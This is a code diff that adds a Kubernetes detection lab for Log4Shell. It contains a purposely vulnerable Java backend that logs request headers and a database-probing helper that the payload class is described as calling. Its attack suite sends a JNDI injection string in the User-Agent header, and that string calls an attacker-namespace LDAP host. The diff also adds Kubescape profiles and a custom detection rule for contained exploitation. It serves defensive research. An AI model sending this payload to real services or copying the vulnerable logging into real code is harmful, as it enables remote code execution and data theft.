+        log.info("chain-backend started on port {}", port);
+    }
+
+    static class ProductHandler implements HttpHandler {
+        public void handle(HttpExchange ex) throws IOException {
+            String q = ex.getRequestURI().getQuery();
+            String ua = ex.getRequestHeaders().getFirst("User-Agent");
+            // The vulnerable line — log4j ≤ 2.14.1 will interpret ${jndi:…} here.
+            log.info("product query q={} ua={}", q, ua);
+
+            String body = "{\"products\":[]}";
+            ex.sendResponseHeaders(200, body.length());
+            try (OutputStream os = ex.getResponseBody()) { os.write(body.getBytes()); }
+        }
+    }
+
+    static class LoginHandler implements HttpHandler {
+        public void handle(HttpExchange ex) throws IOException {
+            // Accepts any creds, returns a fake JWT. Stage-1 auth is not the
+            // detection focus in any scenario.
+            String body = "{\"token\":\"fake.jwt.token\"}";
+            ex.sendResponseHeaders(200, body.length());
+            try (OutputStream os = ex.getResponseBody()) { os.write(body.getBytes()); }
+        }
+    }
+
+    /**
+     * Called by the Payload class (loaded via JNDI). In scenario A the
+     * distroless backend is missing, so an /bin/sh-based exfil works.
+     * In B the same Payload class loads but Runtime.exec() fails ENOENT.
+     */
+    public static String queryPostgresAndExfil(String host, String db, String user) {
+        try (Connection c = DriverManager.getConnection("jdbc:postgresql://" + host + ":5432/" + db, user, "")) {
+            try (Statement st = c.createStatement();
+                 ResultSet rs = st.executeQuery("SELECT current_database()||':'||current_user||':'||substring(version(),1,40)")) {
+                if (rs.next()) return rs.getString(1);
+            }
+        } catch (SQLException e) { return "PG_ERR:" + e.getMessage(); }
+        return "";
+    }
+}

--- a/example/log4j-chain/backend/src/main/resources/log4j2.xml
+++ b/example/log4j-chain/backend/src/main/resources/log4j2.xml
@@ -1,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<Configuration status="WARN">
+    <Appenders>
+        <Console name="Console" target="SYSTEM_OUT">
+            <PatternLayout pattern="%d{ISO8601} [%t] %-5level %logger{36} - %msg%n"/>
+        </Console>
+    </Appenders>
+    <Loggers>
+        <Root level="INFO"><AppenderRef ref="Console"/></Root>
+    </Loggers>
+</Configuration>

--- a/example/log4j-chain/frontend/frontend.yaml
+++ b/example/log4j-chain/frontend/frontend.yaml
@@ -1,0 +1,50 @@
+# Minimal frontend: nginx reverse-proxy in front of chain-backend.
+# Forwards User-Agent + body unchanged. Same image in all 3 scenarios.
+---
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: frontend-conf
+  namespace: log4j-poc
+data:
+  default.conf: |
+    server {
+        listen 8080;
+        location / {
+            proxy_pass http://chain-backend:8080;
+            proxy_set_header User-Agent $http_user_agent;
+            proxy_set_header X-Real-IP $remote_addr;
+        }
+    }
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: chain-frontend
+  namespace: log4j-poc
+spec:
+  replicas: 1
+  selector: { matchLabels: { app: chain-frontend } }
+  template:
+    metadata:
+      labels: { app: chain-frontend }
+    spec:
+      containers:
+      - name: nginx
+        image: nginx:1.27-alpine
+        ports: [{ containerPort: 8080 }]
+        volumeMounts:
+        - { name: conf, mountPath: /etc/nginx/conf.d }
+      volumes:
+      - name: conf
+        configMap: { name: frontend-conf }
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: chain-frontend
+  namespace: log4j-poc
+spec:
+  type: NodePort
+  selector: { app: chain-frontend }
+  ports: [{ port: 8080, targetPort: 8080, nodePort: 30080 }]

--- a/example/log4j-chain/kubescape/README.md
+++ b/example/log4j-chain/kubescape/README.md
@@ -1,0 +1,57 @@
+# Kubescape integration for the log4j PoC
+
+The evaluator consumes signals from two sources:
+
+| source | what it gives us | signals used in this PoC |
+|---|---|---|
+| **Pixie** | protocol-level (HTTP / pg-wire / DNS / payload bytes) | jndi-in-header (01), outbound-LDAP-payload-bytes (03), pgwire-DataRow (05), dns-high-label-entropy (06) |
+| **Kubescape node-agent** | process / file / capability / egress deviations from ApplicationProfile | R0001 unexpected process (04), R0010 unexpected sensitive file (08), R0011 unexpected egress (02), **R1100 failed-execve-ENOENT (new — see `rules/`)** |
+
+Kubescape's R-rules fire when the runtime behaviour deviates from the
+locked ApplicationProfile. That makes them naturally usable as **diagnostic
+queries** in the evaluator: the planner picks which R-rule output channel to
+read next, given the current belief state.
+
+## Pre-baked ApplicationProfiles
+
+`application-profiles/` contains a *minimal* profile per pod that allows
+only the legitimate application behaviour:
+
+- `chain-backend-profile.yaml`: `java` + outbound TCP to `chain-postgres:5432` + log writes
+- `chain-postgres-profile.yaml`: `postgres` + standard DB internals
+
+Anything else fires R-rules. The profiles are pre-baked (not learning-mode)
+so the diagnostic signals are deterministic from the first attack run.
+
+## R1100 — the new rule
+
+Kubescape's default rules do not surface **syscall return codes**. R1100
+fills that gap: it listens to Inspektor Gadget's `exec` trace and fires when
+`execve()` returns `-ENOENT` (errno 2) under a process whose `comm` is `java`
+inside a container whose name contains `backend`.
+
+R1100 is the sole diagnostic signal that distinguishes scenario B (RCE
+contained — distroless image has no `/bin/sh`) from "scenario A in progress".
+Without it the framework would need to wait K seconds for a positive signal
+(new process under java), then commit on the absence. R1100 makes the
+distinction one-shot.
+
+Implementation: `rules/R1100_failed_execve_enoent.go` — drop into
+`node-agent/pkg/ruleengine/v1/` and register in `rule_creator.go`. Enable
+via the RuleSpec in `rules/R1100_rulespec.yaml`.
+
+## Gadgets
+
+`gadgets/` is a placeholder for v2 signals that need new Inspektor Gadget
+tracers:
+
+- **page-cache-hotness probe** — was `/bin/sh` already in page cache when the
+  failed `execve` happened? Diagnostic for "RCE attempted novel code path".
+  Not part of v1.
+- **vfs-flags inspector** — query a pod's mount table to confirm
+  `readOnlyRootFilesystem`. Currently inferred from PodSpec, but a runtime
+  probe would catch tampering / privilege-escalation that mutates mounts.
+  Not part of v1.
+
+Both could be implemented as `IG_GADGET_TYPE=tracer` Go programs running on
+each node and exposed to node-agent via the same gRPC channel R0001 uses.

--- a/example/log4j-chain/kubescape/application-profiles/chain-backend-profile.yaml
+++ b/example/log4j-chain/kubescape/application-profiles/chain-backend-profile.yaml
@@ -1,0 +1,60 @@
+# Pre-baked ApplicationProfile for chain-backend.
+# Allows ONLY the legitimate runtime behaviour:
+#   - java process executing the app jar
+#   - outbound TCP to chain-postgres:5432 (legitimate DB access)
+#   - log writes to stdout
+# Anything else fires the standard R-rules at first event.
+#
+# Pre-baked = phase = "ready" out of the gate. No learning window.
+# bobctl pulled from k8sstormcenter/bob @ pinned SHA.
+---
+apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
+kind: ApplicationProfile
+metadata:
+  name: deployment-chain-backend
+  namespace: log4j-poc
+  annotations:
+    kubescape.io/wlid: "wlid://cluster-local/namespace-log4j-poc/deployment-chain-backend"
+    kubescape.io/completion: "complete"
+    kubescape.io/status: "completed"
+spec:
+  architectures: [amd64]
+  containers:
+  - name: backend
+    capabilities: []
+    execs:
+    - path: /opt/java/openjdk/bin/java
+      args: ["java", "-jar", "/app/app.jar"]
+    opens:
+    - path: /app/app.jar
+      flags: [O_RDONLY]
+    - path: /etc/localtime
+      flags: [O_RDONLY]
+    - path: /etc/resolv.conf
+      flags: [O_RDONLY]
+    syscalls:
+    - read
+    - write
+    - openat
+    - close
+    - mmap
+    - futex
+    - epoll_wait
+    - epoll_ctl
+    - accept4
+    - connect
+    endpoints:
+    - endpoint: ":8080"
+      methods: [GET, POST]
+      direction: inbound
+    egress:
+    - dns: chain-postgres.log4j-poc.svc.cluster.local.
+      ports: [{ protocol: TCP, port: 5432 }]
+    - dns: kube-dns.kube-system.svc.cluster.local.
+      ports: [{ protocol: UDP, port: 53 }]
+    # Notable omissions (which will therefore fire R-rules):
+    #   - exec of /bin/sh, psql, getent — fires R0001 on A
+    #   - outbound TCP to non-postgres targets — fires R0011 on A+B
+    #     (specifically, attacker:1389 LDAP fires R0011)
+    #   - read of /etc/shadow / /var/run/secrets/* — fires R0010
+    #   - DNS to non-cluster nameserver — fires R0005

--- a/example/log4j-chain/kubescape/application-profiles/chain-observer-profile.yaml
+++ b/example/log4j-chain/kubescape/application-profiles/chain-observer-profile.yaml
@@ -1,0 +1,27 @@
+# ApplicationProfile for chain-observer.
+# Allows only outbound HTTP to chain-backend:8080.
+# Any other connection or exec triggers R0011/R0001.
+apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
+kind: ApplicationProfile
+metadata:
+  name: chain-observer
+  namespace: log4j-poc
+  annotations:
+    kubescape.io/managed-by: "user-supplied"
+    kubescape.io/status: "completed"
+spec:
+  containers:
+  - name: observer
+    capabilities: []
+    execs: []
+    opens: []
+    syscalls: []
+    endpoints:
+    - name: chain-backend
+      headers:
+        Host: chain-backend:8080
+      methods: ["GET"]
+      directions: ["Ingress"]
+      ports:
+      - port: 8080
+        protocol: TCP

--- a/example/log4j-chain/kubescape/application-profiles/chain-postgres-profile.yaml
+++ b/example/log4j-chain/kubescape/application-profiles/chain-postgres-profile.yaml
@@ -1,0 +1,39 @@
+# chain-postgres pre-baked profile — allows postgres normal operation only.
+# Pivot detection from this side: if postgres receives a query from a non-
+# backend pod, or if its outbound traffic deviates from the cluster-local
+# expected pattern, R0011 fires.
+---
+apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
+kind: ApplicationProfile
+metadata:
+  name: deployment-chain-postgres
+  namespace: log4j-poc
+  annotations:
+    kubescape.io/wlid: "wlid://cluster-local/namespace-log4j-poc/deployment-chain-postgres"
+    kubescape.io/completion: "complete"
+    kubescape.io/status: "completed"
+spec:
+  architectures: [amd64]
+  containers:
+  - name: postgres
+    capabilities: []
+    execs:
+    - path: /usr/lib/postgresql/16/bin/postgres
+      args: ["postgres"]
+    opens:
+    - path: /var/lib/postgresql/data
+      flags: [O_RDWR]
+    syscalls:
+    - read
+    - write
+    - openat
+    - close
+    - mmap
+    - futex
+    - epoll_wait
+    - accept4
+    endpoints:
+    - endpoint: ":5432"
+      methods: [pg-wire]
+      direction: inbound
+    egress: []

--- a/example/log4j-chain/kubescape/gadgets/page-cache-hotness-gadget.md
+++ b/example/log4j-chain/kubescape/gadgets/page-cache-hotness-gadget.md
@@ -1,0 +1,76 @@
+# Page-cache hotness gadget (v2 — not in PoC v1)
+
+## Why this gadget would exist
+
+The evaluator's decision tree has a layer for "cache" signals, but no
+existing Kubescape rule or default Inspektor Gadget surfaces them. This is
+the rough spec for the gadget that would.
+
+## What it measures
+
+For a given file path + container, returns whether the file's pages are
+currently resident in the kernel page cache. Two probes:
+
+1. **mincore(2) sweep** on a sample of binaries in the container's mount
+   namespace: `/bin/sh`, `/usr/bin/psql`, `/usr/bin/curl`, `/usr/bin/getent`.
+   Returns vector of `(path, present_in_cache_bool, last_access_estimate)`.
+
+2. **eBPF kprobe on filemap_fault** scoped to inode IDs we care about.
+   Fires when the kernel page-faults the target file for the first time
+   (cold-cache load). Diagnostic for "novel exec attempt".
+
+## How the evaluator would use it
+
+After R1100 fires (failed execve ENOENT under JVM), the evaluator queries:
+"was `/bin/sh` cold or hot at execve time?". Answer differentiates:
+
+- **cold + ENOENT** → attacker's payload class is generic — assumed
+  `/bin/sh` would exist; no specific reconnaissance happened first.
+- **hot + ENOENT** → attacker had prior intelligence that something would
+  shell out from this pod, and tried anyway. Possibly an automated
+  payloadation framework that targets specific images.
+
+The distinction matters for IR triage: cold = drive-by, hot = targeted.
+
+## Implementation sketch (Go, IG framework)
+
+```
+package main
+
+import (
+    "github.com/inspektor-gadget/inspektor-gadget/pkg/gadgets"
+    "github.com/inspektor-gadget/inspektor-gadget/pkg/gadgets/trace"
+    "golang.org/x/sys/unix"
+)
+
+type Event struct {
+    eventtypes.CommonData `ebpf:"common"`
+    Path          string `ebpf:"path"`
+    InCache       bool   `ebpf:"in_cache"`
+    LastFaultTime uint64 `ebpf:"last_fault_ns"`
+}
+
+func (g *Gadget) Run(ctx context.Context, host containers.K8sContainer) {
+    // mincore probe on a path list passed in via params
+    for _, path := range g.params.PathList {
+        cached := mincoreProbe(host.MountNS, path)
+        g.emit(Event{Path: path, InCache: cached, ...})
+    }
+    // optional: subscribe to filemap_fault kprobe for live observation
+    g.attachKprobe("filemap_fault", g.onFault)
+    <-ctx.Done()
+}
+```
+
+Then wire into Kubescape node-agent as an event source (same channel pattern
+as the existing exec / dns / open tracers).
+
+## Why it isn't in v1
+
+- Cross-mount-namespace mincore() from the node-agent process requires
+  either CAP_SYS_ADMIN or a per-pod helper. Both work but neither is a
+  half-day's effort.
+- The diagnostic value is *qualitative* (cold-vs-hot), not the kind of
+  signal a decision tree commits a verdict on. It enriches forensic
+  reports more than it changes verdicts.
+- Defer to v2 once R1100 + Pixie signal coverage is validated.

--- a/example/log4j-chain/kubescape/rules/R1100_failed_execve_enoent.go
+++ b/example/log4j-chain/kubescape/rules/R1100_failed_execve_enoent.go
@@ -1,0 +1,121 @@
+// Drop into kubescape/node-agent/pkg/ruleengine/v1/ and register in
+// rule_creator.go (R1100 alongside the existing R0001..R0011).
+//
+// Rationale:
+//   Default Kubescape rules trigger on ApplicationProfile deviations
+//   (positive signals: "this pod did X which is not in its profile").
+//   The log4j PoC needs the complementary signal — a *failed* exec attempt
+//   under a process that already loaded an payload class. The fact that
+//   execve() returned -ENOENT is itself the diagnostic: the JVM tried to
+//   shell out and the container image refused. Without this rule, the
+//   evaluator can only commit on a K-second timeout of silence, which is
+//   slower and less defensible forensically.
+
+package ruleenginev1
+
+import (
+	"fmt"
+	"strings"
+
+	apitypes "github.com/armosec/armoapi-go/armotypes"
+	tracerexectype "github.com/inspektor-gadget/inspektor-gadget/pkg/gadgets/trace/exec/types"
+	"github.com/kubescape/node-agent/pkg/objectcache"
+	"github.com/kubescape/node-agent/pkg/ruleengine"
+	"github.com/kubescape/node-agent/pkg/utils"
+)
+
+const (
+	R1100ID   = "R1100"
+	R1100Name = "Failed execve (ENOENT) under JVM"
+)
+
+var R1100FailedExecveEnoentRuleDescriptor = RuleDescriptor{
+	ID:          R1100ID,
+	Name:        R1100Name,
+	Description: "Container's JVM attempted execve() and got ENOENT — diagnostic for distroless-contained RCE.",
+	Tags:        []string{"log4j-poc", "containment-diagnostic"},
+	Priority:    RulePriorityCritical,
+	Requirements: &RuleRequirements{
+		EventTypes: []utils.EventType{utils.ExecveEventType},
+	},
+	RuleCreationFunc: func() ruleengine.RuleEvaluator {
+		return CreateRuleR1100FailedExecveEnoent()
+	},
+}
+
+type R1100FailedExecveEnoent struct {
+	BaseRule
+}
+
+func CreateRuleR1100FailedExecveEnoent() *R1100FailedExecveEnoent {
+	return &R1100FailedExecveEnoent{}
+}
+
+func (rule *R1100FailedExecveEnoent) Name() string { return R1100Name }
+func (rule *R1100FailedExecveEnoent) ID() string   { return R1100ID }
+func (rule *R1100FailedExecveEnoent) DeleteRule()  {}
+
+func (rule *R1100FailedExecveEnoent) ProcessEvent(
+	eventType utils.EventType,
+	event utils.K8sEvent,
+	objectCache objectcache.ObjectCache,
+) ruleengine.RuleFailure {
+	if eventType != utils.ExecveEventType {
+		return nil
+	}
+	execEvent, ok := event.(*tracerexectype.Event)
+	if !ok {
+		return nil
+	}
+
+	// ENOENT = -2 in linux errno. IG's exec tracer exposes the syscall
+	// return value verbatim in Retval (negative = failure).
+	if execEvent.Retval != -2 {
+		return nil
+	}
+
+	// Only interesting when the offending caller is a JVM thread —
+	// "java" is the standard comm string for openjdk + temurin.
+	if execEvent.Comm != "java" {
+		return nil
+	}
+
+	// Scope to the backend container so we don't fire on unrelated JVMs
+	// elsewhere in the cluster. Adjust the substring for prod use.
+	if !strings.Contains(execEvent.GetContainer(), "backend") {
+		return nil
+	}
+
+	return &GenericRuleFailure{
+		BaseRuntimeAlert: apitypes.BaseRuntimeAlert{
+			AlertName:      rule.Name(),
+			InfectedPID:    execEvent.Pid,
+			FixSuggestions: "Confirm: distroless image is doing its job. Persist the alert; do not auto-mute — this is the smoking gun for contained Log4Shell.",
+			Severity:       R1100FailedExecveEnoentRuleDescriptor.Priority,
+		},
+		RuntimeProcessDetails: apitypes.ProcessTree{
+			ProcessTree: apitypes.Process{
+				Comm: execEvent.Comm,
+				PID:  execEvent.Pid,
+				PPID: execEvent.Ppid,
+				Uid:  &execEvent.Uid,
+				Gid:  &execEvent.Gid,
+			},
+			ContainerID: execEvent.Runtime.ContainerID,
+		},
+		TriggerEvent: execEvent.Event,
+		RuleAlert: apitypes.RuleAlert{
+			RuleDescription: fmt.Sprintf(
+				"JVM in container %q attempted execve(%q) and got ENOENT — RCE landed in JVM but cannot escape to a process.",
+				execEvent.GetContainer(), execEvent.Args,
+			),
+		},
+		RuleID: rule.ID(),
+	}
+}
+
+func (rule *R1100FailedExecveEnoent) Requirements() ruleengine.RuleSpec {
+	return &RuleRequirements{
+		EventTypes: []utils.EventType{utils.ExecveEventType},
+	}
+}

--- a/example/log4j-chain/kubescape/rules/R1100_rulespec.yaml
+++ b/example/log4j-chain/kubescape/rules/R1100_rulespec.yaml
@@ -1,0 +1,25 @@
+# Enables R1100 on the chain-backend workload via node-agent's RuleSpec
+# CRD (kubescape.io/v1, RuntimeRuleAlertBinding).
+---
+apiVersion: kubescape.io/v1
+kind: RuntimeRuleAlertBinding
+metadata:
+  name: log4j-poc-r1100-binding
+  namespace: log4j-poc
+spec:
+  podSelector:
+    matchLabels:
+      app: chain-backend
+  rules:
+  - ruleID: R1100        # Failed execve (ENOENT) under JVM
+    parameters:
+      # No tunables in v1 — the rule is hard-coded to java + backend.
+      # When promoted out of PoC, the comm-name filter and container-name
+      # substring should move into parameters here.
+      {}
+  # Companion rules that are already in node-agent's default set and which
+  # the evaluator queries alongside R1100. Listed here for explicitness.
+  - ruleID: R0001        # Unexpected process launched
+  - ruleID: R0005        # DNS anomalies in container
+  - ruleID: R0010        # Unexpected sensitive file access
+  - ruleID: R0011        # Unexpected egress network traffic

--- a/example/log4j-chain/log4j-attacks.yaml
+++ b/example/log4j-chain/log4j-attacks.yaml
@@ -1,0 +1,78 @@
+apiVersion: bobctl.k8sstormcenter.io/v1alpha1
+kind: AttackSuite
+metadata:
+  name: log4j-chain-three-scenarios
+  description: |
+    ONE payload, THREE scenarios — the active-diagnosis framework's
+    discriminator test (Log4Shell / CVE-2021-44228).
+
+    Same User-Agent string in every scenario:
+      ${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}
+
+    Same topology (chain-frontend → chain-backend → chain-postgres + a
+    cross-namespace LDAP server in attacker-ns).
+
+    What differs is the chain-backend container:
+      A = eclipse-temurin:11-jdk + log4j 2.14.1 + /bin/sh present
+      B = distroless/java11-debian11 + log4j 2.14.1 + hardened SC (RO-fs, non-root)
+      C = eclipse-temurin:11-jdk + log4j 2.17.1 (patch)
+
+    Detection narrative (with kubescape ApplicationProfile baseline learned
+    from log4j-chain-benign-baseline):
+      A: R0011 (egress to attacker:1389), R0001 (new comm /bin/sh under
+         java), R0010 (sensitive-file read /etc/shadow), R0011 again on
+         the DNS exfil egress.
+      B: R0011 (egress to attacker:1389), R1100 (failed execve ENOENT
+         — distroless has no /bin/sh, the smoking-gun "contained at exec").
+      C: nothing — log4j 2.17.1 doesn't perform JNDI substitution. The
+         JNDI literal lands in the HTTP headers and stays inert. This is
+         the negative-control scenario (clean verdict despite identical
+         payload).
+
+    Re-deploy chain-backend between scenarios (see RUNBOOK-FOR-AGENTS.md
+    step 5). The AttackSuite itself is identical across all three.
+
+target:
+  service: chain-frontend
+  namespace: log4j-poc
+  port: 8080
+  protocol: http
+
+attacks:
+  - name: s1-recon-benign-login
+    type: probe
+    http:
+      method: POST
+      path: /api/login
+      headers:
+        Content-Type: application/json
+      body: '{"user":"alice","pass":"<stolen>"}'
+    successIndicators:
+      - statusCode: 200
+    expectedDetections: []   # benign — exercises the JWT issue path
+
+  - name: s2-jndi-in-user-agent
+    type: jndi-injection
+    http:
+      method: GET
+      path: /api/products?q=test
+      headers:
+        User-Agent: '${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}'
+    successIndicators:
+      - statusCode: 200
+    expectedDetections:
+      # On scenario A
+      - rule: R0011
+        target: chain-backend
+        condition: outbound to attacker.attacker-ns.svc.cluster.local:1389
+      - rule: R0001
+        target: chain-backend
+        condition: new comm /bin/sh under java parent
+      - rule: R0010
+        target: chain-backend
+        condition: sensitive file access (/etc/shadow or /var/run/secrets/*)
+      # On scenario B (replaces R0001 / R0010 above)
+      - rule: R1100
+        target: chain-backend
+        condition: failed execve ENOENT under java parent
+      # On scenario C — none expected

--- a/example/log4j-chain/log4j-chain.yaml
+++ b/example/log4j-chain/log4j-chain.yaml
@@ -76,7 +76,11 @@ spec:
     spec:
       containers:
       - name: postgres
-        image: postgres:15-alpine
+        # Debian-based on purpose — keeps the libc consistent with chain-backend
+        # (eclipse-temurin:11-jdk = debian-slim). An alpine pg in the same ns
+        # makes node-agent's R0002 fire on musl-vs-glibc path differences
+        # (see BoB-agent's portability finding #2 on PR #131).
+        image: postgres:15-bookworm
         env:
         - { name: POSTGRES_HOST_AUTH_METHOD, value: trust }
         - { name: POSTGRES_DB,               value: appdb }
@@ -157,10 +161,16 @@ spec:
     spec:
       containers:
       - name: observer
-        image: curlimages/curl:8.6.0
+        # Debian base (matches chain-backend's eclipse-temurin glibc).
+        # The previous curlimages/curl:8.6.0 was alpine/musl, which made
+        # /bin/sleep resolve to /bin/busybox and broke the chain-observer
+        # ApplicationProfile across libc boundaries (see BoB-agent's
+        # portability finding #2 on PR #131).
+        image: debian:12-slim
         command: [/bin/sh, -c]
         args:
         - |
+          apt-get update -qq && apt-get install -y -qq --no-install-recommends curl ca-certificates >/dev/null
           while true; do
             curl -sf http://chain-backend:8080/api/products \
               -H 'User-Agent: chain-observer/1.0' -o /dev/null || true

--- a/example/log4j-chain/log4j-chain.yaml
+++ b/example/log4j-chain/log4j-chain.yaml
@@ -1,0 +1,244 @@
+# Log4Shell three-scenario chain demo — single-file deployment of every
+# piece that the FunctionalTestSuite and AttackSuite expect to find.
+#
+# Topology (always the same — the SBoB-discriminator IS that ONE thing
+# differs across scenarios: the chain-backend container image):
+#
+#   USER ──▶ chain-frontend (nginx) ──▶ chain-backend (Java + log4j)
+#                                            │
+#                                            ├──▶ chain-postgres (5432)
+#                                            └──▶ attacker.attacker-ns:1389 (JNDI)
+#                                                              :8888 (class fetch)
+#
+#   chain-observer polls /api/products every 30s — never attacked, used
+#   by the diagnose framework as the negative-control workload.
+#
+# This file ships namespaces + postgres + frontend + attacker + observer +
+# scenario-A backend (vulnerable + ops-friendly). For scenario B or C,
+# apply backend-{b,c}.yaml afterwards (and `kubectl delete deploy
+# chain-backend -n log4j-poc` between switches — nginx caches the upstream
+# pod IP so a `kubectl rollout restart deploy chain-frontend` is also
+# required after each backend swap).
+#
+# Image refs assume bobctl's standard tag scheme. Override with sed or
+# kustomize. The Dockerfiles are at example/log4j-chain/{backend,attacker}/.
+
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+  name: log4j-poc
+  labels:
+    kubescape.io/ignore: "false"
+    app.kubernetes.io/part-of: log4j-chain-demo
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+  name: attacker-ns
+  labels:
+    kubescape.io/ignore: "false"
+    app.kubernetes.io/part-of: log4j-chain-demo
+
+# ────────────────────── chain-postgres ────────────────────────────────
+---
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: pg-seed
+  namespace: log4j-poc
+data:
+  seed.sql: |
+    -- Minimal product table so the backend's /api/products has something
+    -- to query. The attacker payload's psql probe just reads
+    -- current_database() || current_user — doesn't depend on this table.
+    CREATE TABLE IF NOT EXISTS products (
+        id   SERIAL PRIMARY KEY,
+        name TEXT NOT NULL,
+        sku  TEXT UNIQUE NOT NULL
+    );
+    INSERT INTO products (name, sku) VALUES
+        ('widget', 'WID-001'),
+        ('gadget', 'GAD-002'),
+        ('thingamajig', 'THI-003')
+    ON CONFLICT (sku) DO NOTHING;
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: chain-postgres
+  namespace: log4j-poc
+spec:
+  replicas: 1
+  selector: { matchLabels: { app: chain-postgres } }
+  template:
+    metadata: { labels: { app: chain-postgres } }
+    spec:
+      containers:
+      - name: postgres
+        image: postgres:15-alpine
+        env:
+        - { name: POSTGRES_HOST_AUTH_METHOD, value: trust }
+        - { name: POSTGRES_DB,               value: appdb }
+        ports: [{ containerPort: 5432 }]
+        volumeMounts:
+        - { name: seed, mountPath: /docker-entrypoint-initdb.d }
+      volumes:
+      - name: seed
+        configMap: { name: pg-seed }
+---
+apiVersion: v1
+kind: Service
+metadata: { name: chain-postgres, namespace: log4j-poc }
+spec:
+  selector: { app: chain-postgres }
+  ports: [{ port: 5432, targetPort: 5432 }]
+
+# ────────────────────── chain-frontend ────────────────────────────────
+---
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: frontend-conf
+  namespace: log4j-poc
+data:
+  default.conf: |
+    server {
+        listen 8080;
+        location / {
+            proxy_pass http://chain-backend:8080;
+            proxy_set_header User-Agent $http_user_agent;
+            proxy_set_header X-Real-IP $remote_addr;
+        }
+    }
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: chain-frontend
+  namespace: log4j-poc
+spec:
+  replicas: 1
+  selector: { matchLabels: { app: chain-frontend } }
+  template:
+    metadata: { labels: { app: chain-frontend } }
+    spec:
+      containers:
+      - name: nginx
+        image: nginx:1.27-alpine
+        ports: [{ containerPort: 8080 }]
+        volumeMounts:
+        - { name: conf, mountPath: /etc/nginx/conf.d }
+      volumes:
+      - name: conf
+        configMap: { name: frontend-conf }
+---
+apiVersion: v1
+kind: Service
+metadata: { name: chain-frontend, namespace: log4j-poc }
+spec:
+  type: NodePort
+  selector: { app: chain-frontend }
+  ports: [{ port: 8080, targetPort: 8080, nodePort: 30080 }]
+
+# ────────────────────── chain-observer (negative control) ─────────────
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: chain-observer
+  namespace: log4j-poc
+  labels: { role: observer }
+spec:
+  replicas: 1
+  selector: { matchLabels: { app: chain-observer } }
+  template:
+    metadata: { labels: { app: chain-observer, role: observer } }
+    spec:
+      containers:
+      - name: observer
+        image: curlimages/curl:8.6.0
+        command: [/bin/sh, -c]
+        args:
+        - |
+          while true; do
+            curl -sf http://chain-backend:8080/api/products \
+              -H 'User-Agent: chain-observer/1.0' -o /dev/null || true
+            sleep 30
+          done
+---
+apiVersion: v1
+kind: Service
+metadata: { name: chain-observer, namespace: log4j-poc }
+spec:
+  selector: { app: chain-observer }
+  ports: [{ port: 8080, targetPort: 8080 }]
+
+# ────────────────────── attacker (cross-ns LDAP + HTTP) ───────────────
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: attacker
+  namespace: attacker-ns
+spec:
+  replicas: 1
+  selector: { matchLabels: { app: attacker } }
+  template:
+    metadata: { labels: { app: attacker } }
+    spec:
+      containers:
+      - name: attacker
+        # Built from example/log4j-chain/attacker/Dockerfile (marshalsec +
+        # python3 HTTP server serving Payload.class on :8888).
+        image: ghcr.io/k8sstormcenter/log4j-chain-attacker:latest
+        imagePullPolicy: IfNotPresent
+        ports:
+        - { containerPort: 1389, name: ldap }
+        - { containerPort: 8888, name: http }
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: attacker
+  namespace: attacker-ns
+spec:
+  selector: { app: attacker }
+  ports:
+  - { name: ldap, port: 1389, targetPort: 1389 }
+  - { name: http, port: 8888, targetPort: 8888 }
+
+# ────────────────────── chain-backend SCENARIO A (vulnerable) ─────────
+# Switch to scenario B / C by replacing this Deployment with backend-b.yaml
+# or backend-c.yaml. The other manifests above are scenario-independent.
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: chain-backend
+  namespace: log4j-poc
+  labels: { scenario: "A" }
+spec:
+  replicas: 1
+  selector: { matchLabels: { app: chain-backend } }
+  template:
+    metadata: { labels: { app: chain-backend, scenario: "A" } }
+    spec:
+      containers:
+      - name: backend
+        # Built from example/log4j-chain/backend/Dockerfile.vulnerable
+        # (log4j 2.14.1 + temurin-11 + trustURLCodebase=true + psql/curl/getent).
+        image: ghcr.io/k8sstormcenter/log4j-chain-backend-vulnerable:latest
+        imagePullPolicy: IfNotPresent
+        env:
+        - { name: POSTGRES_HOST, value: "chain-postgres" }
+        - { name: POSTGRES_DB,   value: "appdb" }
+        - { name: POSTGRES_USER, value: "postgres" }
+        ports: [{ containerPort: 8080 }]
+---
+apiVersion: v1
+kind: Service
+metadata: { name: chain-backend, namespace: log4j-poc }
+spec:
+  selector: { app: chain-backend }
+  ports: [{ port: 8080, targetPort: 8080 }]

--- a/example/log4j-chain/log4j-functional-tests.yaml
+++ b/example/log4j-chain/log4j-functional-tests.yaml
@@ -1,0 +1,61 @@
+apiVersion: bobctl.k8sstormcenter.io/v1alpha1
+kind: FunctionalTestSuite
+metadata:
+  name: log4j-chain-benign-baseline
+  description: |
+    Benign HTTP traffic against the log4j chain's frontend. Run during
+    learning to populate the FOUR sbobs in the log4j-poc namespace:
+
+      chain-frontend.ApplicationProfile   → nginx + sh
+      chain-frontend.NetworkNeighborhood  → kube-dns, chain-backend
+      chain-backend.ApplicationProfile    → java + psql + getent + curl
+      chain-backend.NetworkNeighborhood   → kube-dns, chain-postgres
+      chain-postgres.ApplicationProfile   → postgres + admin tools
+      chain-postgres.NetworkNeighborhood  → kube-dns (resolver init)
+      chain-observer.ApplicationProfile   → curl + sh
+      chain-observer.NetworkNeighborhood  → kube-dns, chain-backend
+
+    Traffic shape is the user-facing API:
+      GET  /healthz                  — liveness
+      GET  /api/products?q=<term>    — read path → backend → pg-wire SELECT
+      POST /api/login {user,pass}    — auth path → backend issues JWT
+
+    chain-observer already runs this pattern on a 30s loop while it's
+    deployed (see observer.yaml). This FunctionalTestSuite gives bobctl
+    an explicit, replayable handle.
+
+target:
+  service: chain-frontend
